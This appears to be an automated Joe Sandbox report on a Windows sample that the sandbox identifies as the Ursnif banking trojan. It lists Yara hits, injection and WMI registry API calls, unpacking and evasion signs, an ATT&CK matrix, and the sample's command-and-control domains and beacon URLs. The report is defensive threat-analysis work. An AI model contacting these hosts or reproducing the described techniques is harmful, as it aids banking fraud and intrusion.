Source: Yara match	File source: 00000000.00000003.355125356.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: R0xLHA2mT5.exe PID: 3608, type: MEMORYSTR
Source: Yara match	File source: 0.2.R0xLHA2mT5.exe.42a94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.R0xLHA2mT5.exe.22b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.R0xLHA2mT5.exe.42a94a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.559974818.00000000042A9000.00000004.00000040.sdmp, type: MEMORY

Source: R0xLHA2mT5.exe, 00000000.00000002.559091455.000000000234A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.354992227.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355061879.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355102011.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.560013904.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355079733.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355113871.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355042494.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355017568.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355125356.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: R0xLHA2mT5.exe PID: 3608, type: MEMORYSTR
Source: Yara match	File source: 0.2.R0xLHA2mT5.exe.42a94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.R0xLHA2mT5.exe.22b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.R0xLHA2mT5.exe.42a94a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.559974818.00000000042A9000.00000004.00000040.sdmp, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: R0xLHA2mT5.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	Code function: 0_2_022B836E	0_2_022B836E
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	Code function: 0_2_022B7FBE	0_2_022B7FBE
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	Code function: 0_2_022BAFC0	0_2_022BAFC0

Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	Code function: 0_2_00401703 NtMapViewOfSection,	0_2_00401703
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	Code function: 0_2_00401C90 GetProcAddress,NtCreateSection,memset,	0_2_00401C90
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	Code function: 0_2_004019A0 NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	0_2_004019A0
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	Code function: 0_2_022B9A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_022B9A0F
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	Code function: 0_2_022BB1E5 NtQueryVirtualMemory,	0_2_022BB1E5

Source: R0xLHA2mT5.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: R0xLHA2mT5.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: R0xLHA2mT5.exe	Metadefender: Detection: 22%
Source: R0xLHA2mT5.exe	ReversingLabs: Detection: 45%

Source: R0xLHA2mT5.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\R0xLHA2mT5.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\R0xLHA2mT5.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@4/2

Source: C:\Users\user\Desktop\R0xLHA2mT5.exe

Code function: 0_2_022B8F1B CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_022B8F1B

Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\R0xLHA2mT5.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: R0xLHA2mT5.exe

Static PE information: More than 200 imports for KERNEL32.dll

Source: R0xLHA2mT5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: R0xLHA2mT5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: R0xLHA2mT5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: R0xLHA2mT5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: R0xLHA2mT5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: R0xLHA2mT5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: R0xLHA2mT5.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\julokapinuf\da.pdb source: R0xLHA2mT5.exe
Source:	Binary string: C:\julokapinuf\da.pdbP+C source: R0xLHA2mT5.exe

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\R0xLHA2mT5.exe

Unpacked PE file: 0.2.R0xLHA2mT5.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\R0xLHA2mT5.exe

Unpacked PE file: 0.2.R0xLHA2mT5.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;

Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	Code function: 0_2_022BE62F push edi; retf	0_2_022BE630
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	Code function: 0_2_022BAC00 push ecx; ret	0_2_022BAC09
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	Code function: 0_2_022BAFAF push ecx; ret	0_2_022BAFBF
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	Code function: 0_2_022BE9AC push 0B565A71h; ret	0_2_022BE9B1
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	Code function: 0_2_0042E630 push ecx; mov dword ptr [esp], 00000000h	0_2_0042E631
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	Code function: 0_2_023600A6 push esp; iretd	0_2_023600B7
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	Code function: 0_2_02363EAD push 12BFE4EFh; ret	0_2_02363EB2
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	Code function: 0_2_0235EE91 push edx; iretd	0_2_0235EEC8
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	Code function: 0_2_0235E89D push esi; iretd	0_2_0235E89E
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	Code function: 0_2_02362CF3 push es; iretd	0_2_02362CF6
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	Code function: 0_2_0235F184 push ebx; retf	0_2_0235F196
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	Code function: 0_2_02365B88 push ds; ret	0_2_02365B89

Source: C:\Users\user\Desktop\R0xLHA2mT5.exe

Code function: 0_2_00401264 LoadLibraryA,GetProcAddress,

0_2_00401264

Source: initial sample

Static PE information: section name: .text entropy: 7.03993935197

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.354992227.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355061879.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355102011.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.560013904.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355079733.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355113871.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355042494.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355017568.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355125356.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: R0xLHA2mT5.exe PID: 3608, type: MEMORYSTR
Source: Yara match	File source: 0.2.R0xLHA2mT5.exe.42a94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.R0xLHA2mT5.exe.22b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.R0xLHA2mT5.exe.42a94a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.559974818.00000000042A9000.00000004.00000040.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Source: R0xLHA2mT5.exe, 00000000.00000002.559383521.00000000023C6000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559183663.000000000236A000.00000004.00000001.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\R0xLHA2mT5.exe

Code function: 0_2_00401264 LoadLibraryA,GetProcAddress,

0_2_00401264

Source: C:\Users\user\Desktop\R0xLHA2mT5.exe

Code function: 0_2_0235C2F6 push dword ptr fs:[00000030h]

0_2_0235C2F6

Source: R0xLHA2mT5.exe, 00000000.00000002.559717345.00000000028D0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: R0xLHA2mT5.exe, 00000000.00000002.559717345.00000000028D0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: R0xLHA2mT5.exe, 00000000.00000002.559717345.00000000028D0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: R0xLHA2mT5.exe, 00000000.00000002.559717345.00000000028D0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\R0xLHA2mT5.exe

Code function: 0_2_022B7A2E cpuid

0_2_022B7A2E

Source: C:\Users\user\Desktop\R0xLHA2mT5.exe

Code function: 0_2_00401E22 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_00401E22

Source: C:\Users\user\Desktop\R0xLHA2mT5.exe

Code function: 0_2_00401752 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_00401752

Source: C:\Users\user\Desktop\R0xLHA2mT5.exe

Code function: 0_2_022B7A2E RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

0_2_022B7A2E

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.354992227.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355061879.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355102011.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.560013904.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355079733.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355113871.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355042494.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355017568.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355125356.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: R0xLHA2mT5.exe PID: 3608, type: MEMORYSTR
Source: Yara match	File source: 0.2.R0xLHA2mT5.exe.42a94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.R0xLHA2mT5.exe.22b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.R0xLHA2mT5.exe.42a94a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.559974818.00000000042A9000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.354992227.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355061879.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355102011.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.560013904.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355079733.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355113871.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355042494.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355017568.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355125356.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: R0xLHA2mT5.exe PID: 3608, type: MEMORYSTR
Source: Yara match	File source: 0.2.R0xLHA2mT5.exe.42a94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.R0xLHA2mT5.exe.22b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.R0xLHA2mT5.exe.42a94a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.559974818.00000000042A9000.00000004.00000040.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	Path Interception	Process Injection1	Process Injection1	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Obfuscated Files or Information2	LSASS Memory	Security Software Discovery1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer4	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing22	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	Account Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol14	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	System Owner/User Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
R0xLHA2mT5.exe	23%	Metadefender		Browse
R0xLHA2mT5.exe	45%	ReversingLabs	Win32.Trojan.Chapak
R0xLHA2mT5.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.R0xLHA2mT5.exe.2130e50.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.R0xLHA2mT5.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
0.3.R0xLHA2mT5.exe.2140000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.R0xLHA2mT5.exe.22b0000.2.unpack	100%	Avira	HEUR/AGEN.1108168	Download File

Domains

Source	Detection	Scanner	Label	Link
qoderunovos.website	0%	Virustotal		Browse
soderunovos.website	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://soderunovos.website/	0%	Avira URL Cloud	safe
https://soderunovos.website/_	0%	Avira URL Cloud	safe
https://soderunovos.websitehttps://qoderunovos.website	0%	Avira URL Cloud	safe
https://soderunovos.website/jdraw/Few7Dvcu/4Rmd9fKY9IL2UtEgJUD5q9n/BajREx_2Bc/Peb7n8IHTpfTu9y6I/faIv	0%	Avira URL Cloud	safe
https://soderunovos.website/T	0%	Avira URL Cloud	safe
https://soderunovos.website/s	0%	Avira URL Cloud	safe
https://soderunovos.website	0%	Avira URL Cloud	safe
https://soderunovos.website/0	0%	Avira URL Cloud	safe
https://qoderunovos.website	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
new-fp-shed.wg1.b.yahoo.com	87.248.100.216	true	false		high
yahoo.com	74.6.231.21	true	false		high
www.yahoo.com	unknown	unknown	false		high
qoderunovos.website	unknown	unknown	true	0%, Virustotal, Browse	unknown
soderunovos.website	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://yahoo.com/jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJkcZdncwpj/ywnxu6MUxONK0Xvi9f/ucETuIFdm/wokZPT9eFRDqyFNdNZik/FUVXSPqAP_2FwjH1nuX/3xMD5fDEH8K9cekhYWTKgU/lNhM0C6AYaGMU/wTNgbH70ZfWGyVix/60.crw	false		high
https://www.yahoo.com/jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJkcZdncwpj/ywnxu6MUxONK0Xvi9f/ucETuIFdm/wokZPT9eFRDqyFNdNZik/FUVXSPqAP_2FwjH1nuX/3xMD5fDEH8K9cekhYWTKgU/lNhM0C6AYaGMU/wTNgbH70ZfWGyVix/60.crw	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://soderunovos.website/	R0xLHA2mT5.exe, 00000000.00000003.448832665.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://soderunovos.website/_	R0xLHA2mT5.exe, 00000000.00000003.448832665.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://soderunovos.websitehttps://qoderunovos.website	R0xLHA2mT5.exe, 00000000.00000003.355102011.0000000004778000.00000004.00000040.sdmp, R0xLHA2mT5.exe, 00000000.00000002.560013904.0000000004778000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fbxL1xwjyIDF%2fWhnrXJWmz	R0xLHA2mT5.exe, 00000000.00000003.355137973.000000000477B000.00000004.00000040.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp	false		high
https://soderunovos.website/jdraw/Few7Dvcu/4Rmd9fKY9IL2UtEgJUD5q9n/BajREx_2Bc/Peb7n8IHTpfTu9y6I/faIv	R0xLHA2mT5.exe, 00000000.00000002.559418267.00000000023E0000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.448819097.00000000023DD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://soderunovos.website/T	R0xLHA2mT5.exe, 00000000.00000003.448832665.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://soderunovos.website/s	R0xLHA2mT5.exe, 00000000.00000003.448832665.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://yahoo.com/d	R0xLHA2mT5.exe, 00000000.00000002.559183663.000000000236A000.00000004.00000001.sdmp	false		high
https://yahoo.com/jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJkcZd	R0xLHA2mT5.exe, 00000000.00000002.559183663.000000000236A000.00000004.00000001.sdmp	false		high
https://soderunovos.website	R0xLHA2mT5.exe, 00000000.00000003.355102011.0000000004778000.00000004.00000040.sdmp, R0xLHA2mT5.exe, 00000000.00000002.560013904.0000000004778000.00000004.00000040.sdmp	true	Avira URL Cloud: safe	unknown
https://www.yahoo.com/?	R0xLHA2mT5.exe, 00000000.00000003.448832665.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	false		high
https://www.yahoo.com/jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJ	R0xLHA2mT5.exe, 00000000.00000002.559418267.00000000023E0000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.448819097.00000000023DD000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559183663.000000000236A000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354046152.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354919579.00000000023E0000.00000004.00000001.sdmp	false		high
https://soderunovos.website/0	R0xLHA2mT5.exe, 00000000.00000003.448832665.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://qoderunovos.website	R0xLHA2mT5.exe, 00000000.00000003.355102011.0000000004778000.00000004.00000040.sdmp, R0xLHA2mT5.exe, 00000000.00000002.560013904.0000000004778000.00000004.00000040.sdmp	true	Avira URL Cloud: safe	unknown
https://policies.yahoo.com/w3c/p3p.xml	R0xLHA2mT5.exe, 00000000.00000003.355102011.0000000004778000.00000004.00000040.sdmp, R0xLHA2mT5.exe, 00000000.00000003.355137973.000000000477B000.00000004.00000040.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559183663.000000000236A000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354919579.00000000023E0000.00000004.00000001.sdmp	false		high
https://www.yahoo.com/	R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	false		high
https://yahoo.com/b	R0xLHA2mT5.exe, 00000000.00000002.559183663.000000000236A000.00000004.00000001.sdmp	false		high
https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=0p1	R0xLHA2mT5.exe, 00000000.00000003.355102011.0000000004778000.00000004.00000040.sdmp, R0xLHA2mT5.exe, 00000000.00000003.355137973.000000000477B000.00000004.00000040.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559183663.000000000236A000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp	false		high
https://www.yahoo.com/6	R0xLHA2mT5.exe, 00000000.00000003.448832665.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
74.6.231.21	yahoo.com	United States		36646	YAHOO-NE1US	false
87.248.100.216	new-fp-shed.wg1.b.yahoo.com	United Kingdom		34010	YAHOO-IRDGB	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	528072
Start date:	24.11.2021
Start time:	18:22:58
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	R0xLHA2mT5.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/0@4/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 15% (good quality ratio 14.4%) Quality average: 82.1% Quality standard deviation: 27.1%
HCA Information:	Successful, ratio: 66% Number of executed functions: 50 Number of non-executed functions: 52
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

